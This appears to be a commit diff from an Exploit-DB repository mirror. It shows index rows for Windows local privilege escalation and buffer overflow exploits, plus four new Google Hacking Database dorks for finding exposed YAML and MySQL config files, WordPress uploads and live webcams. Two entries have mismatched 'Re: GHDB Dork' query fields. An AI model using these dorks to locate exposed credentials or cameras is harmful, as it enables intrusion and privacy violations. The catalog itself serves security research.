50558,exploits/windows/local/50558.txt,"MilleGPG5 5.7.2 Luglio 2021 - Local Privilege Escalation",2021-12-01,"Alessandro Salzano",local,windows,,2021-12-01,2021-12-01,0,,,,,,
51410,exploits/windows/local/51410.txt,"MilleGPG5 5.9.2 (Gennaio 2023) - Local Privilege Escalation / Incorrect Access Control",2023-05-02,"Andrea Intilangelo",local,windows,,2023-05-02,2023-05-02,0,CVE-2023-25438,,,,,
9618,exploits/windows/local/9618.py,"Millenium MP3 Studio - '.pls' / '.mpf' / '.m3u' Universal Local Buffer Overflow (SEH)",2009-09-09,hack4love,local,windows,,2009-09-08,,1,OSVDB-56574,,,,http://www.exploit-db.commillennium1.exe,
9298,exploits/windows/local/9298.pl,"Millenium MP3 Studio 1.0 - '.mpf' Local Stack Overflow (2)",2009-07-30,corelanc0d3r,local,windows,,2009-07-29,,1,,,,,,
11191,exploits/windows/local/11191.pl,"Millenium MP3 Studio 1.x - '.m3u' Local Stack Overflow",2010-01-19,NeoCortex,local,windows,,2010-01-18,,1,,,,,http://www.exploit-db.commillennium1.exe,

Can't render this file because it is too large.

60
ghdb.xml
View file

@ -45438,6 +45438,21 @@ Author: Abhi Chitkara
<date>2020-05-07</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>8174</id>
<link>https://www.exploit-db.com/ghdb/8174</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;users.yml&quot; | &quot;admin.yml&quot; | &quot;config.yml&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;users.yml&quot; | &quot;admin.yml&quot; | &quot;config.yml&quot;
# Files Containing Juicy Info
# Date:02/05/2023
# Exploit Author: Mohammed A.Siledar</textualDescription>
<query>Google dork submission: intitle:&quot;index of&quot; &quot;users.yml&quot; | &quot;admin.yml&quot; | &quot;config.yml&quot;</query>
<querystring>https://www.google.com/search?q=Google dork submission: intitle:&quot;index of&quot; &quot;users.yml&quot; | &quot;admin.yml&quot; | &quot;config.yml&quot;</querystring>
<edb></edb>
<date>2023-05-02</date>
<author>Mohammed A.Siledar</author>
</entry>
<entry>
<id>6176</id>
<link>https://www.exploit-db.com/ghdb/6176</link>
@ -48397,6 +48412,21 @@ It contains key username and password text sensitive information.
<date>2021-10-25</date>
<author>Ramjan Ali Sabber</author>
</entry>
<entry>
<id>8171</id>
<link>https://www.exploit-db.com/ghdb/8171</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:index.of conf.mysql</shortDescription>
<textualDescription># Google Dork: intitle:index.of conf.mysql
# Files Containing Juicy Info
# Date:02/05/2023
# Exploit Author: Ramjan Ali Sabber</textualDescription>
<query>Re: GHDB Dork</query>
<querystring>https://www.google.com/search?q=Re: GHDB Dork</querystring>
<edb></edb>
<date>2023-05-02</date>
<author>Ramjan Ali Sabber</author>
</entry>
<entry>
<id>111</id>
<link>https://www.exploit-db.com/ghdb/111</link>
@ -48651,6 +48681,21 @@ Author: Lord.TMR</textualDescription>
<date>2023-01-31</date>
<author>Insha Ahsan Raj</author>
</entry>
<entry>
<id>8173</id>
<link>https://www.exploit-db.com/ghdb/8173</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl: &quot;/wp-content/uploads&quot;</shortDescription>
<textualDescription># Google Dork: inurl: &quot;/wp-content/uploads&quot;
# Files Containing Juicy Info
# Date:02/05/2023
# Exploit Author: Andrew Gimenez</textualDescription>
<query>inurl: &quot;/wp-content/uploads&quot;</query>
<querystring>https://www.google.com/search?q=inurl: &quot;/wp-content/uploads&quot;</querystring>
<edb></edb>
<date>2023-05-02</date>
<author>Andrew Gimenez</author>
</entry>
<entry>
<id>8115</id>
<link>https://www.exploit-db.com/ghdb/8115</link>
@ -101600,6 +101645,21 @@ Website: (https://the-infosec.com)
<date>2018-12-17</date>
<author>Alfie</author>
</entry>
<entry>
<id>8172</id>
<link>https://www.exploit-db.com/ghdb/8172</link>
<category>Various Online Devices</category>
<shortDescription>intitle: &quot;webcam&quot; site: &quot;live&quot;</shortDescription>
<textualDescription># Google Dork: intitle: &quot;webcam&quot; site: &quot;live&quot;
# Various Online Devices
# Date:02/05/2023
# Exploit Author: Ramjan Ali Sabber</textualDescription>
<query>Re: GHDB - Dork</query>
<querystring>https://www.google.com/search?q=Re: GHDB - Dork</querystring>
<edb></edb>
<date>2023-05-02</date>
<author>Ramjan Ali Sabber</author>
</entry>
<entry>
<id>7599</id>
<link>https://www.exploit-db.com/ghdb/7599</link>